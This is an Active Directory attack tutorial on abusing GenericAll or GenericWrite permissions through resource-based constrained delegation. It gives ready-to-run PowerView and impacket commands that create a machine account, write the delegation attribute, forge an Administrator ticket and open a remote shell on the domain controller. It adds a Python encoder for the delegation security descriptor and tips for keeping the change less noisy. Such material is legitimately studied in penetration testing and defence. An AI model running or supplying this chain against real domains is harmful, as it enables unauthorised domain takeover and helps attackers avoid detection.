Access to resources in Active Directory Domain Services is granted through Access Control Entries (ACEs).
An ACE describes the permissions allowed or denied to a principal on a securable object (user, group, computer, container, organizational unit (OU), GPO, etc.). The Discretionary Access Control List (DACL) of an object is the list of ACEs that identifies the users and groups that are allowed or denied access to it. When ACEs are misconfigured, they can be abused for lateral movement or privilege escalation within an AD domain.
GenericAll grants full control over the object, including its extended rights (for example, force-resetting a user's password). GenericWrite grants write access to all of the object's attributes, which is enough to add members to a group or, on a computer object, to set the attribute that controls resource-based constrained delegation.
<aside>
ℹ️ Example: If the attacker has GenericAll over a user, they do not need to know that user's current password: they can force a reset to a known value with PowerView's Set-DomainUserPassword.
</aside>
Using PowerView, check whether our user (or a group it belongs to, see the IdentityReference field) has GenericAll or GenericWrite on the Domain Controller's computer object (<DC-COMPUTER-NAME>):
Import-Module .\PowerView.ps1; Get-ObjectAcl -SamAccountName <DC-COMPUTER-NAME> | ?{$_.ActiveDirectoryRights -match "GenericAll|GenericWrite"}
GenericWrite on a computer object can be used to perform a resource-based constrained delegation (RBCD) attack, because it allows writing that computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
First create a new machine account we control. This requires the domain's ms-DS-MachineAccountQuota to be greater than 0 (the default of 10 lets any authenticated user add up to ten computers). If -computer-name and -computer-pass are omitted, impacket-addcomputer generates a random name and password and prints them; either way, note both values, as they are needed below:
impacket-addcomputer -computer-name '<COMPUTER-NAME-GENERATED>$' -computer-pass '<COMPUTER-PASSWORD>' -dc-ip <DOMAIN.CONTROLLER.IP> domain/username:'password'
Then write the RBCD attribute on the DC's computer object so that the new machine is allowed to act on behalf of other identities toward the DC. The new machine can then obtain service tickets to the DC as any user (via S4U2self followed by S4U2proxy), except accounts that are marked "sensitive and cannot be delegated" or are members of the Protected Users group. Use -action read afterwards to confirm the attribute now lists the new machine:
impacket-rbcd -delegate-from '<COMPUTER-NAME-GENERATED>$' -delegate-to '<DC-COMPUTER-NAME>$' -dc-ip <DOMAIN.CONTROLLER.IP> -action write domain/username:'password'
Then, authenticating as the new machine account, request a service ticket for the DC's CIFS service that impersonates Administrator. getST saves the ticket to a .ccache file and prints its name:
impacket-getST -spn 'cifs/<DC-COMPUTER-NAME>.domain' -impersonate Administrator -dc-ip <DOMAIN.CONTROLLER.IP> 'domain/<COMPUTER-NAME-GENERATED>$:<COMPUTER-PASSWORD>'
Finally, point KRB5CCNAME at the saved ticket and log in to the DC with wmiexec using Kerberos authentication (the target must be given as the FQDN matching the SPN in the ticket):
KRB5CCNAME='<ticket file name printed by getST>' impacket-wmiexec -k -no-pass domain/administrator@<DC-COMPUTER-NAME>.domain
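What the -action write step above actually stores, as an added example that is not part of the original page or of impacket itself: a pure-Python encoder and decoder for the security descriptor that goes into msDS-AllowedToActOnBehalfOfOtherIdentity. The layout and constants (self-relative descriptor with SE_DACL_PRESENT, ACL revision 4, full-control mask 0x000F01FF, BUILTIN\Administrators as owner and group) follow MS-DTYP and what impacket's rbcd.py writes; the function names are mine, the SIDs are constructed sample values, and nothing here talks to a DC. Reading the value back is what -action read does, and the merge function mirrors the fact that an existing, legitimate delegation on the target should be preserved rather than clobbered.

```python
"""Build and read back the msDS-AllowedToActOnBehalfOfOtherIdentity value that
an RBCD write stores on the delegate-to computer object.  Pure Python, no LDAP
connection: the SIDs used below are constructed sample values."""
import struct

# MS-DTYP constants
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION_DS = 4                 # ACL revision required for AD DACLs
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF           # mask impacket's rbcd.py grants the delegate-from account
BUILTIN_ADMINS = "S-1-5-32-544"     # owner and group rbcd.py sets on the descriptor


def sid_to_bytes(sid):
    """Encode an SDDL SID string ('S-1-5-21-...') into its binary layout."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S" or parts[1] != "1":
        raise ValueError("not an SDDL SID string: %r" % sid)
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if len(subs) > 15:
        raise ValueError("too many sub-authorities in %r" % sid)
    return (bytes([1, len(subs)]) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(buf, offset=0):
    """Decode a binary SID at buf[offset:]; returns (sid_string, byte_length)."""
    revision, count = buf[offset], buf[offset + 1]
    if revision != 1:
        raise ValueError("unsupported SID revision %d" % revision)
    authority = int.from_bytes(buf[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, offset + 8)
    return "S-1-%d" % authority + "".join("-%d" % s for s in subs), 8 + 4 * count


def build_rbcd_sd(delegate_from_sids):
    """Self-relative SECURITY_DESCRIPTOR whose DACL holds one ACCESS_ALLOWED ACE
    (full control) per SID: the value written for the RBCD attribute."""
    aces = b""
    for sid in delegate_from_sids:
        sid_bytes = sid_to_bytes(sid)
        ace_size = 4 + 4 + len(sid_bytes)          # ACE header + mask + SID
        aces += struct.pack("<BBH", ACCESS_ALLOWED_ACE_TYPE, 0, ace_size)
        aces += struct.pack("<I", FULL_CONTROL) + sid_bytes
    acl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces),
                      len(delegate_from_sids), 0) + aces
    owner = group = sid_to_bytes(BUILTIN_ADMINS)
    offset_dacl = 20                                # fixed descriptor header size
    offset_owner = offset_dacl + len(acl)
    offset_group = offset_owner + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         offset_owner, offset_group, 0, offset_dacl)
    return header + acl + owner + group


def read_rbcd_sd(sd):
    """List the SIDs allowed to act on behalf of other identities, i.e. the
    trustees of ACCESS_ALLOWED ACEs in the DACL (what -action read shows).
    An empty attribute or a descriptor without a DACL yields []."""
    if not sd:
        return []
    revision, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if revision != 1:
        raise ValueError("bad security descriptor revision %d" % revision)
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    sids, pos = [], off_dacl + 8
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(sid_from_bytes(sd, pos + 8)[0])
        pos += ace_size                             # AceSize lets us skip other ACE types
    return sids


def add_delegate(existing_sd, new_sid):
    """Merge new_sid into an existing value instead of overwriting it, as
    rbcd.py -action write does when the attribute is already populated."""
    sids = read_rbcd_sd(existing_sd)
    if new_sid not in sids:
        sids.append(new_sid)
    return build_rbcd_sd(sids)


if __name__ == "__main__":
    # Constructed sample SID for the machine account created with addcomputer
    new_machine = "S-1-5-21-1234567890-123456789-1234567890-1105"
    sd = build_rbcd_sd([new_machine])
    print(len(sd), "bytes:", sd.hex())
    print("delegates:", read_rbcd_sd(sd))
    other = "S-1-5-21-1234567890-123456789-1234567890-1106"
    print("after merge:", read_rbcd_sd(add_delegate(sd, other)))
```

Before writing, fetch the current attribute value and run it through read_rbcd_sd: a non-empty result means a legitimate delegation already exists on the target, and replacing it instead of merging both breaks that service and is a much noisier change than appending one ACE. The same decoder works for clean-up, since removing the ACE for your machine account and writing the remainder back (or flushing the attribute if it was empty before) restores the original state.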